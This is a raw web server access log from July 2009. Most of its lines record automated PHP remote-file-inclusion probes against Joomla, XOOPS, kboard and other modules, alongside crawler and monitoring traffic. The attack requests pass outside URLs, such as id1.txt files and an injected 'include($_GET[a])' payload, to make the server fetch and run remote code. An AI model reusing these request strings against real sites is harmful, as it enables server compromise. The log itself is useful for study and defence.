61.109.250.50 - - [26/Jul/2009:02:14:52 -0400] "GET /logs/access_log.Q109063000//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:14:52 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:14:52 -0400] "GET /logs/access_log.Q109063000//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:14:52 -0400] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:14:56 -0400] "GET /logs/access_log.Q109063000%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:15:02 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:15:02 -0400] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:15:02 -0400] "GET /logs/access_log.Q109063000//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:15:07 -0400] "GET /logs/access_log.Q109061100%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
38.99.13.118 - - [26/Jul/2009:02:15:12 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
61.109.250.50 - - [26/Jul/2009:02:15:18 -0400] "GET /logs/access_log.Q109061100//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.109.250.50 - - [26/Jul/2009:02:15:22 -0400] "GET /logs/access_log.Q109061100//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
38.99.44.103 - - [26/Jul/2009:02:15:25 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
61.109.250.50 - - [26/Jul/2009:02:15:34 -0400] "GET /logs/access_log.Q109061100//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:02:15:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:02:15:41 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:16:31 -0400] "GET /images/_notes/ace_bkgrd_wide_r2_c1.gif.mno HTTP/1.1" 200 264 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.109.250.50 - - [26/Jul/2009:02:16:35 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.orstalumni.com/board//include/yuo.txt? HTTP/1.1" 404 252 "-" "Advanced Browser (http://www.avantbrowser.com)"
61.109.250.50 - - [26/Jul/2009:02:16:41 -0400] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.orstalumni.com/board//include/yuo.txt? HTTP/1.1" 404 257 "-" "Advanced Browser (http://www.avantbrowser.com)"
201.232.54.48 - - [26/Jul/2009:02:19:04 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
63.147.72.145 - - [26/Jul/2009:02:19:42 -0400] "GET /index2.php?x=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:19:42 -0400] "GET /logs/index2.php?x=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:19:42 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:02:20:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.129.7 - - [26/Jul/2009:02:21:01 -0400] "GET /logs/access_log.Q109060100//index.php?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.249.68.247 - - [26/Jul/2009:02:23:05 -0400] "GET /images/_notes/nav_store_search_numb2.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.234.7.92 - - [26/Jul/2009:02:25:21 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
89.234.7.92 - - [26/Jul/2009:02:25:23 -0400] "GET //index.php?option=com_custompages&cpage=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
89.234.7.92 - - [26/Jul/2009:02:25:23 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
66.249.68.247 - - [26/Jul/2009:02:25:33 -0400] "GET /images/index16_procchem.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
89.234.7.92 - - [26/Jul/2009:02:25:36 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
209.59.12.99 - - [26/Jul/2009:02:25:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.29.159.130 - - [26/Jul/2009:02:25:48 -0400] "GET //modules/errors.php?error=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
217.29.159.130 - - [26/Jul/2009:02:25:49 -0400] "GET /logs//modules/errors.php?error=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
218.38.136.251 - - [26/Jul/2009:02:27:45 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:02:27:45 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:02:27:45 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:02:28:19 -0400] "GET /logs/access_log.Q109070200//include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:29:39 -0400] "GET /images/_notes/nav_store_fav_off_r1_c5.jpg.mno HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:02:30:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:02:30:52 -0400] "GET //appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:30:52 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:30:52 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:31:35 -0400] "GET /logs/access_log.Q109061900//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:34:59 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:34:59 -0400] "GET /logs/access_log.Q109063000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:35:00 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:35:00 -0400] "GET /logs/access_log.Q109051900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:35:05 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:35:06 -0400] "GET /logs/access_log.Q109063000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:35:06 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:02:35:06 -0400] "GET /logs/access_log.Q109051900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:02:35:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.177.55 - - [26/Jul/2009:02:35:51 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:02:35:51 -0400] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:02:35:51 -0400] "GET /logs/access_log.Q109063000//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:02:36:04 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:02:36:06 -0400] "GET //?_zb_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:02:36:06 -0400] "GET /logs//?_zb_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 11071 "-" "libwww-perl/5.79"
66.249.68.247 - - [26/Jul/2009:02:36:14 -0400] "GET /images/_notes/ACE_HQ_vignette.jpg.mno HTTP/1.1" 200 174 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.177.55 - - [26/Jul/2009:02:36:17 -0400] "GET /logs/access_log.Q109061100//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:37:22 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:37:22 -0400] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:37:22 -0400] "GET /logs/access_log.Q109063000//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:37:26 -0400] "GET /logs/access_log.Q109062900//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:02:38:13 -0400] "GET /logs/access_log.Q109063000%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:02:38:25 -0400] "GET /logs/access_log.Q109061100%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:39:18 -0400] "GET /logs/access_log.Q109063000%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:02:39:18 -0400] "GET /logs/access_log.Q109062900%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:02:39:59 -0400] "GET /logs/access_log.Q109050800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:02:39:59 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:02:39:59 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:02:39:59 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
63.147.72.145 - - [26/Jul/2009:02:40:05 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:40:05 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:40:05 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:40:26 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:37 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:37 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:37 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:37 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:37 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:37 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:39 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:39 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:39 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:02:40:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.97.132.151 - - [26/Jul/2009:02:40:41 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:40:43 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:40:57 -0400] "GET /errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:40:57 -0400] "GET /logs/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:40:57 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:02:41:09 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:02:41:09 -0400] "GET /logs/error_log.Q109063000//?_zb_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
74.205.123.49 - - [26/Jul/2009:02:41:10 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
74.205.123.49 - - [26/Jul/2009:02:41:10 -0400] "GET //modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
74.205.123.49 - - [26/Jul/2009:02:41:10 -0400] "GET /logs//modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
87.20.186.139 - - [26/Jul/2009:02:41:16 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:41:30 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:41:30 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
201.232.54.48 - - [26/Jul/2009:02:41:30 -0400] "GET /logs/access_log.Q109050800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
201.232.54.48 - - [26/Jul/2009:02:41:30 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
201.232.54.48 - - [26/Jul/2009:02:41:30 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
201.232.54.48 - - [26/Jul/2009:02:41:30 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
63.147.72.145 - - [26/Jul/2009:02:41:31 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:41:46 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
95.168.170.105 - - [26/Jul/2009:02:42:01 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
95.168.170.105 - - [26/Jul/2009:02:42:01 -0400] "GET //modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
95.168.170.105 - - [26/Jul/2009:02:42:01 -0400] "GET /logs//modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
87.20.186.139 - - [26/Jul/2009:02:42:41 -0400] "GET /logs/access_log.Q109061900%20%20//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:42:49 -0400] "GET /images/_notes/home_welcome1.gif.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.189.39.159 - - [26/Jul/2009:02:43:31 -0400] "GET /logs/access_log.Q109060300/show.php?path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.189.39.159 - - [26/Jul/2009:02:43:31 -0400] "GET /show.php?path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.189.39.159 - - [26/Jul/2009:02:43:31 -0400] "GET /logs/show.php?path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.205.123.49 - - [26/Jul/2009:02:43:31 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
211.189.39.159 - - [26/Jul/2009:02:43:37 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://bangsat6.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
95.168.170.105 - - [26/Jul/2009:02:43:59 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
